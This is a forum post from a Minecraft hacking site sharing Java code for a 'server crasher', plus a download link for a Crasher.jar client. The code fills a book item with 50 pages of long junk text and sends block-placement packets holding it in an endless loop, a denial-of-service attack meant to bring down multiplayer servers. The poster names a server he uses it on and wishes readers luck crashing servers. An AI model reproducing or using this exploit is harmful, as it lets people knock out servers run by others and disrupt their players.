Welcome on MasterOf13FPS! MasterOf13FPS

Register today or sign up if you are already a member and never miss any cool content again :)

Server Crasher code

MasterOf13FPS

Administrator
Staff member
Administrator
MasterOf13FPS
Joined
Jul 11, 2020
Messages
0
Reaction score
23
Points
0
Hello guys! I found this code in "Crasher client" Usually i using on "play.bullmc.ru" and guys spamming in chat "server is down" so in my opinion it is working. GL for server crashing! :)

Client: [HIDE]http://www.mediafire.com/file/ta3kib20rj32s4b/Crasher.jar/file[/HIDE]

Crasher code: [HIDE]
Code:
new Thread() {
                @Override
                public void run() {
                    try {
                        Wrapper.msg("&eCrashing server...", true);
                        final NBTTagList list = new NBTTagList();
                        final NBTTagCompound tag = new NBTTagCompound();
                        final String author = Minecraft.getMinecraft().getSession().getUsername();
                        final String title = "Play with me.";
                       final String size = "wveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5vr2c43rc434v432tvt4tvybn4n6n57u6u57m6m6678mi68,867,79o,o97o,978iun7yb65453v4tyv34t4t3c2cc423rc334tcvtvt43tv45tvt5t5v43tv5345tv43tv5355vt5t3tv5t533v5t45tv43vt4355t54fwveb54yn4y6y6hy6hb54yb5436by5346y3b4yb343yb453by45b34y5by34yb543yb54y5 h3y4h97,i567yb64t5";
                        for (int i = 0; i < 50; ++i) {
                            final String siteContent = size;
                            final NBTTagString tString = new NBTTagString(siteContent);
                            list.appendTag(tString);
                        }
                        tag.setString("author", author);
                        tag.setString("title", title);
                        tag.setTag("pages", list);
                        ChatCommands.book.setTagInfo("pages", list);
                        ChatCommands.book.setTagCompound(tag);
                        while (true) {
                           Wrapper.sendPacket(new C08PacketPlayerBlockPlacement(new BlockPos(Wrapper.player().posX, Wrapper.player().posY - 2.0, Wrapper.player().posZ), 1, ChatCommands.book, 0.0f, 0.0f, 0.0f));
                            Thread.sleep(10L);
                        }
                    }
                    catch (Exception e) {
                        e.printStackTrace();
                    }
                }
            }.start();
[/HIDE]

If you have any problem with this write comment and i will fix it or remove this post.

13.01.2019 - by FantaCoke
» Code-Tags hinzugefügt
» Link Click-Event hinzugefügt
 
Last edited by a moderator:
shape1
shape2
shape3
shape4
shape5
shape6
Back
Top